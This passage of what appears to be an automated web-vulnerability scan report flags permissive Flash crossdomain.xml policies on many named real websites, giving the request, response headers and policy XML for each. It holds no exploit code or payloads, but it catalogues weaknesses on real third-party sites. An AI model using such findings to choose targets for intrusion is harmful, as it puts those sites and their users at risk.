Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 22 Oct 2010 18:22:44 GMT
Accept-Ranges: bytes
ETag: "b44c91e1672cb1:0"
serverID: web02
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 151

<cross-domain-policy>
   <allow-access-from domain="docstoc.com" to-ports="*" />
   <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.49. http://www.doctoroz.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
ETag: "4e5a-c9-4711fc791f940"
Last-Modified: Fri, 14 Aug 2009 20:20:13 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:44 GMT
Content-Length: 201
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
...[SNIP]...

7.50. http://www.ebaumsworld.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="*" />
</cross-do
...[SNIP]...

7.51. http://www.education.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.education.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Mon, 28 Feb 2011 18:40:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.52. http://www.ehow.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 02:54:34 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:19 GMT
Content-Length: 117
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.53. http://www.eventful.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eventful.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eventful.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 16 Apr 2011 13:35:52 GMT
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1641692581"
Last-Modified: Wed, 10 Feb 2010 18:55:07 GMT
Content-Length: 201
Date: Sat, 02 Apr 2011 13:35:52 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.54. http://www.everydayhealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 17 Dec 2010 22:02:56 GMT
Accept-Ranges: bytes
ETag: "0e8ca28369ecb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.55. http://www.evtv1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 216
Content-Type: text/xml
Last-Modified: Tue, 03 Mar 2009 14:07:08 GMT
Accept-Ranges: bytes
ETag: "2ed3e15699cc91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

7.56. http://www.ew.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.57. http://www.ez-tracks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:23 GMT
Content-Length: 208
Content-Type: text/xml
Content-Location: http://www.ez-tracks.com/crossdomain.xml
Last-Modified: Wed, 01 Dec 2004 14:18:24 GMT
Accept-Ranges: bytes
ETag: "12a73b9eb0d7c41:cb57"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.58. http://www.flixster.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:51 GMT
ETag: "64"
Accept-Ranges: bytes
Content-Length: 100
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.59. http://www.freeonlinegames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 17:53:10 GMT
ETag: "180823b-a5-dc9e0d80"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

7.60. http://www.g4tv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml
Content-Length: 208
Cache-Control: private, max-age=58266
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.61. http://www.gamerdna.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "7bce-a2-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.62. http://www.gamesradar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:06 GMT
ETag: "2bc0006-1cc-485c998d72580"
Accept-Ranges: bytes
Content-Length: 460
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gr22static.gamesradar.com" />
   <allow-access-from domain="static22.gamesradar.com" />
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" />
   <allow-access-from domain="*" />
...[SNIP]...

7.63. http://www.gametrailers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 02 Feb 2011 00:17:00 GMT
ETag: "1268c463d-cf-49b4191509700"
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:37:31 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.64. http://www.gourmandia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 21:34:46 GMT
ETag: "66880b1-ce-f3774980"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.65. http://www.greenwichmeantime.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Sat, 20 Mar 2010 13:46:58 GMT
ETag: "c8c8aa-100-b408ce80"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*" />
...[SNIP]...

7.66. http://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 164396
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

7.67. http://www.health.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.68. http://www.hiconversion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hiconversion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hiconversion.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:17 GMT
ETag: W/"104-1301603701000"
Last-Modified: Thu, 31 Mar 2011 20:35:01 GMT
Server: Apache/2.2.9 (Fedora)
Vary: Accept-Encoding
Content-Length: 104
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.69. http://www.hodesiq.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hodesiq.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hodesiq.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 17:51:43 GMT
Accept-Ranges: bytes
ETag: "dbdeeabd629ca1:aea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.70. http://www.hollywoodreporter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/xml
Last-Modified: Sun, 10 Oct 2010 23:05:43 GMT
Content-Length: 193
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:45:55 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.71. http://www.howstuffworks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:32 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
Content-Length: 200
Content-Type: text/xml; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.72. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

7.73. http://www.imagebam.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imagebam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imagebam.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:30 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 15:06:52 GMT
ETag: "63bda7-cb-48e56c3e8fb00"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.74. http://www.imageshack.us/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: text/xml
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Connection: close
Set-Cookie: is_uuid=fe9301e8d0274d608c047983f575fec4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...

7.75. http://www.ingdirect.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:21:42 GMT
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 209
ETag: "pv26ac04c4b7dfa765f73411be4237c54b"
X-PvInfo: [S10232.C6966.A37933.RA0.G94E8.U62A8AA9F].[OT/xml.OG/pages]
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.76. http://www.instructables.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

